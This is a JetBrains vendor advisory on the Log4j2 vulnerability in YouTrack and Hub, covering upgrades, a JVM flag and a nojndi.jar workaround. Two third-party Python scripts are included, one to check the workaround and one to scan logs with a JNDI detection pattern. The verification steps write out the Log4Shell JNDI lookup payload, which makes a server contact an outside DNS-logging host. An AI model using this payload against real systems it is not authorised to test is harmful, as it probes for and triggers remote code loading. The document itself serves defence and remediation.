
YouTrack update regarding Log4j2 vulnerability

Update from December 29, 2021, 16:00 (GMT +0). The latest YouTrack and Hub versions (2021.4.36872 and 2021.1.14127 respectively) released on December 21st include log4j 2.17. To the best of our knowledge, these YouTrack and Hub versions are not affected by any known log4j-related vulnerabilities discovered to date (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832 and CVE-2021-45105). Feel free to download and install these YouTrack and Hub versions.
We will no longer be updating this blog post. Any new information relating to the log4j CVEs will be published in our quarterly security bulletin. You can subscribe to the security bulletin here.

Update from December 21, 2021, 23:00 (GMT +0). To the best of our knowledge, the newly discovered CVE-2021-45105 does not affect YouTrack or Hub.
To address another vulnerability, CVE-2021-45046, we released YouTrack 2021.4.36179 and Hub 2021.1.14108 on December 16, 2021. Please download and install these YouTrack and Hub versions. Follow the issue for more details.


Update from December 15, 2021, 21:00 (GMT +0). We’ve found a workaround solution that lets customers without upgrade subscriptions secure their installations. Please refer to the section Securing YouTrack and Hub without upgrading below for details.
For further updates and community discussion on the topic, please follow this issue.


This announcement is about a security vulnerability that was found in a third-party library used in JetBrains YouTrack. 

YouTrack InCloud customers are already safe. We have analyzed access logs and found that no attempts were made to exploit the vulnerability before we eliminated it from YouTrack InCloud.

Administrators of some YouTrack Standalone installations must take further action to secure their instances.

Please read this announcement for a full update on the current situation and immediate action that you must take if you run a YouTrack Standalone installation.


What happened

On December 9, 2021, a security vulnerability was found in a third-party library used in JetBrains YouTrack. This security vulnerability affects YouTrack instances from version 2018.1 to version 2021.4.35732. To secure your YouTrack Standalone installation, please proceed with the steps below.

Actions for YouTrack Standalone administrators

On Friday, December 10, 2021, we sent an email to administrators of all potentially affected YouTrack Standalone instances. The email contained instructions to restart YouTrack using a parameter to disable the affected library.

It has since come to our attention that this action alone may not have been sufficient to secure some instances.

If you use YouTrack Standalone 2017.4 or earlier, you do not need to take any further action.

If you use YouTrack Standalone 2018.1 or later, please take the additional steps below to secure your YouTrack.

What actions you should take

  • If you use YouTrack Standalone 2017.4 or earlier or 2021.4.35970 or later, your installation is already safe and no additional actions are required from your side.

  • If you use YouTrack Standalone from 2018.1 to 2021.4.35732 and you have an external Hub installed, please secure your installation immediately by: 
    • upgrading YouTrack to version 2021.4.35970, and
    • upgrading Hub to version 2021.1.14080.  

      Alternatively, you can:
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here), and
    • restart your Hub with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to Hub can be found here (an example for Docker can be found here).

      Please refer to the corresponding Hub vulnerability announcement for further details on securing your Hub installation.

  • If you use a YouTrack Standalone version from 2018.1 to 2021.2 without an external Hub, the optimal way to secure your installation is to upgrade to the latest YouTrack version, 2021.4.35970.

    If your upgrade subscription covers an upgrade to at least 2021.3, you can:
    • upgrade to version 2021.3, and
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here).

  • If you use a YouTrack Standalone version from 2021.3 to 2021.4.35732 without an external Hub, please secure your installation immediately by: 
    • upgrading YouTrack to version 2021.4.35970

      Alternatively, you can:
    • restart your YouTrack with the parameter `-Dlog4j2.formatMsgNoLookups=true`. A guide on how to apply a parameter to YouTrack can be found here (an example for Docker can be found here).

Update from December 15, 2021, 21:00 (GMT +0).

Securing YouTrack and Hub without upgrading

We’ve found a solution that lets you secure any YouTrack or Hub installation without upgrading. Unfortunately, we can’t provide you with backports since it would be impossible to deliver them in a timely manner, hence the workaround. 

This workaround was checked by our QA team and should eliminate both CVE-2021-44228 and CVE-2021-45046 vulnerabilities. It requires some administration skills so please contact your system administrator to apply the patch. 

Full instructions are below.

YouTrack

Prerequisites

  1. This workaround secures any version of a YouTrack installation.
  2. You will need your `conf` folder. If you can’t locate the installation folder, check `<your YouTrack address>/admin/statistics` → Installation Folder. The default `conf` folder locations are:
    – ZIP: `folder_where_you_extracted_ZIP_archive\conf`
    – JAR: `${user.home}/teamsysdata/conf`
    – MSI: `%programdata%\JetBrains\YouTrack\conf`
    – Docker: `/opt/youtrack/conf`, or the conf location specified in the command you use to start YouTrack in Docker
  3. You will need the `youtrack.jvmoptions` file. It is located inside the `conf` folder. Here is a guide on how to edit the `youtrack.jvmoptions` file for each distribution type: https://www.jetbrains.com/help/youtrack/standalone/Configure-JVM-Options.html#set-jvm-options-manually

Steps

  1. Stop your YouTrack.
  2. Download the file (`nojndi.jar`) and add it to the `conf` folder. Make sure this file has the same permissions as the other files in this folder.
  3. For JAR/ZIP/MSI: add the line `-javaagent:conf/nojndi.jar` to the `youtrack.jvmoptions` file. For Docker: add the line `-javaagent:/opt/youtrack/conf/nojndi.jar` to the `youtrack.jvmoptions` file.
  4. Start your YouTrack.

The `nojndi.jar` file mentioned above is based on the NCC Group publications and is distributed under the Apache 2 license.

How to verify 

You can check that the workaround was applied successfully and your installation is now secure by doing the following:

  1. Go to http://dnslog.cn/ and click “Get SubDomain”. You will get a generated subdomain, for example `rigpz8.dnslog.cn`.
  2. In your browser, make a request to YouTrack with `/api/${jndi:ldap://subdomain.dnslog.cn/a}` in the URI, where `subdomain` should be replaced with the subdomain that was generated for you in the previous step (in this case `rigpz8`).
    Example: `https://<your YouTrack address>/api/config/$%7Bjndi:ldap://rigpz8.dnslog.cn/a%7D`
  3. Go back to http://dnslog.cn/ and click “Refresh record”.
  4. If you don’t see any new requests, the patch has been applied successfully.

You can also capture requests by other means (custom DNS server, Wireshark, etc).
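The access-log review mentioned at the top of this announcement can be scripted. The following is an added example (not JetBrains' tooling) that flags lines of a combined-format access log carrying the `${jndi:` lookup string, including the URL-encoded `$%7Bjndi:` form shown in step 2 above; the log format and the sample lines are constructed.

```python
"""Flag Log4j JNDI lookup strings in web access log lines.

Added example, not JetBrains' tooling. It matches `${jndi:` in any field of a
combined-format access log after undoing URL encoding, so the `$%7Bjndi:...%7D`
form from the verification step is caught. Sample log lines are constructed.
"""
import re
from urllib.parse import unquote

JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# client, ident, user, [timestamp] ... (Apache/Nginx combined log format)
LOG_PREFIX = re.compile(r"^(\S+) \S+ \S+ \[([^\]]+)\]")

def url_decode(text, passes=2):
    """Undo up to `passes` rounds of percent-encoding (double encoding is common)."""
    for _ in range(passes):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def contains_jndi_lookup(text):
    """True if the text carries a JNDI lookup in plain or percent-encoded form."""
    return JNDI_LOOKUP.search(url_decode(text)) is not None

def scan_access_log(lines):
    """Return (client, timestamp, line) for every line carrying a JNDI lookup."""
    hits = []
    for line in lines:
        if not contains_jndi_lookup(line):
            continue
        m = LOG_PREFIX.match(line)
        client, ts = m.groups() if m else ("?", "?")
        hits.append((client, ts, line.rstrip()))
    return hits

# Constructed sample lines; addresses use reserved documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:08:01:12 +0000] "GET /api/config/$%7Bjndi:ldap://example.invalid/a%7D HTTP/1.1" 404 12 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:08:02:40 +0000] "GET /issues HTTP/1.1" 200 8821 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:08:03:05 +0000] "GET /api/$%257Bjndi:ldap://example.invalid/b%257D HTTP/1.1" 404 12 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for client, ts, line in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {client}: {line}")
```

Point the script at your real access log (one line per entry) to list the client addresses and timestamps worth investigating; the double-decoding pass catches the `%25`-encoded variant that a single decode misses.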

If you need assistance from our support engineers, please note that we are experiencing a high volume of requests at the moment. If you have an expired subscription, please expect significant delays in our reply. 

For further updates and community discussion on the instruction above, please follow the issue.

External Hub

Prerequisites

  1. This workaround secures any version of a Hub installation.
  2. You will need your `conf` folder. The default `conf` folder locations are:
    – ZIP: `folder_where_you_extracted_ZIP_archive\conf`
    – MSI: `%programdata%\JetBrains\Hub\conf`
    – Docker: `/opt/hub/conf`, or the conf location specified in the command you use to start Hub in Docker.
  3. You will need the `hub.jvmoptions` file. It is located inside the `conf` folder. Here is a guide on how to edit the `hub.jvmoptions` file for each distribution type: https://www.jetbrains.com/help/hub/Configure-JVM-Options.html#modify-jvm-options-in-file

Steps

  1. Stop your Hub.
  2. Download the file (`nojndi.jar`) and add it to the `conf` folder. Make sure this file has the same permissions as the other files in this folder.
  3. For ZIP/MSI: add the line `-javaagent:conf/nojndi.jar` to the `hub.jvmoptions` file. For Docker: add the line `-javaagent:/opt/hub/conf/nojndi.jar` to the `hub.jvmoptions` file.
  4. Start your Hub.

The `nojndi.jar` file mentioned above is based on the NCC Group publications and is distributed under the Apache 2 license.
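For both the YouTrack steps and the Hub steps above, the following added example (not JetBrains' tooling) checks a `conf` folder against what steps 2 and 3 require: the jar is present, the jvmoptions file carries the right `-javaagent:` line for the distribution type, and the jar's permission bits match the other files in the folder. It assumes the jvmoptions file is named after the product (`youtrack.jvmoptions` / `hub.jvmoptions`) as the prerequisites state and that Docker uses the `/opt/<product>/conf` path from step 3; `build_sample_conf()` creates a constructed throwaway folder for demonstration only.

```python
"""Verify the nojndi.jar workaround layout in a YouTrack or Hub conf folder.
Added example, not JetBrains' tooling; build_sample_conf() creates a throwaway
folder that is constructed purely for demonstration.
"""
import stat
import tempfile
from pathlib import Path

def expected_agent_line(product, distribution):
    """-javaagent argument as the announcement gives it (product: youtrack|hub)."""
    if distribution == "docker":
        return f"-javaagent:/opt/{product}/conf/nojndi.jar"
    return "-javaagent:conf/nojndi.jar"  # JAR / ZIP / MSI

def check_workaround(conf_dir, product, distribution):
    """Return a list of problems; an empty list means the layout matches the steps."""
    conf, problems = Path(conf_dir), []
    jar, opts = conf / "nojndi.jar", conf / f"{product}.jvmoptions"
    if not jar.is_file():
        problems.append("nojndi.jar is missing from the conf folder")
    if not opts.is_file():
        problems.append(f"{opts.name} not found")
    else:
        wanted = expected_agent_line(product, distribution)
        lines = [l.strip() for l in opts.read_text().splitlines()]
        if wanted not in lines:
            problems.append(f"{opts.name} lacks the line {wanted}")
        # A second -javaagent line pointing elsewhere usually means a typo.
        problems += [f"unexpected agent line: {l}" for l in lines
                     if l.startswith("-javaagent:") and l != wanted]
    if jar.is_file():
        mode = stat.S_IMODE(jar.stat().st_mode)
        others = {stat.S_IMODE(p.stat().st_mode)
                  for p in conf.iterdir() if p.is_file() and p != jar}
        if others and mode not in others:
            problems.append(f"nojndi.jar mode {oct(mode)} differs from other conf files")
    return problems

def build_sample_conf(product="youtrack", distribution="docker",
                      with_agent=True, jar_mode=0o644):
    """Build a throwaway conf folder (constructed; not a real installation)."""
    conf = Path(tempfile.mkdtemp(prefix=f"{product}-conf-"))
    (conf / f"{product}.properties").write_text("# placeholder\n")
    agent = expected_agent_line(product, distribution) if with_agent else ""
    (conf / f"{product}.jvmoptions").write_text(f"-Xmx1g\n{agent}\n")
    (conf / "nojndi.jar").write_bytes(b"PK\x03\x04")  # stand-in bytes, not the real jar
    for p in conf.iterdir():
        p.chmod(0o644)
    (conf / "nojndi.jar").chmod(jar_mode)
    return conf
```

Run `check_workaround("/path/to/conf", "hub", "docker")` (or `"youtrack"`, with `"zip"`, `"jar"` or `"msi"` as appropriate) against the real folder before starting the service; an empty list means all three conditions hold.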

How to verify 

You can check that the workaround was applied successfully and your installation is now secure by doing the following:

  1. Go to http://dnslog.cn/ and click “Get SubDomain”. As a result, you will get a generated subdomain, for example `rigpz8.dnslog.cn`.
  2. Go to your Hub -> Settings -> Groups and create a new test group with any name.
  3. Navigate to the group settings and insert `${jndi:ldap://subdomain.dnslog.cn/a}` into the group description field, where `subdomain` should be replaced with the subdomain that was generated for you in the previous step (in this case `rigpz8`). Click “Save”.
  4. Go back to http://dnslog.cn/ and click “Refresh record”.
  5. If you don’t see any new requests, the patch has been applied successfully.

You can also capture requests by other means (custom DNS server, Wireshark, etc).

If you need assistance from our support engineers, please note that we are experiencing a high volume of requests at the moment. If you have an expired subscription, please expect significant delays in our reply. 


For further updates and community discussion on the instruction above, please follow the issue.

End of update.

What actions we’ve taken

  • We immediately took all necessary steps to secure YouTrack InCloud instances on December 10, 2021, and applied a permanent fix to protect against the vulnerability. This required unscheduled maintenance downtime that may have coincided with your business hours and interrupted your work. We apologize for any inconvenience caused. In such situations, your security is our first priority.

  • We released a security update for YouTrack (version 2021.4.35970) on December 14, 2021. Download it here and install it.
  • We released a security update for Hub (version 2021.1.14080) on December 13, 2021. Download it here and install it.   

If you need any further assistance, please contact our support or simply comment on this blog post.

Your JetBrains YouTrack team
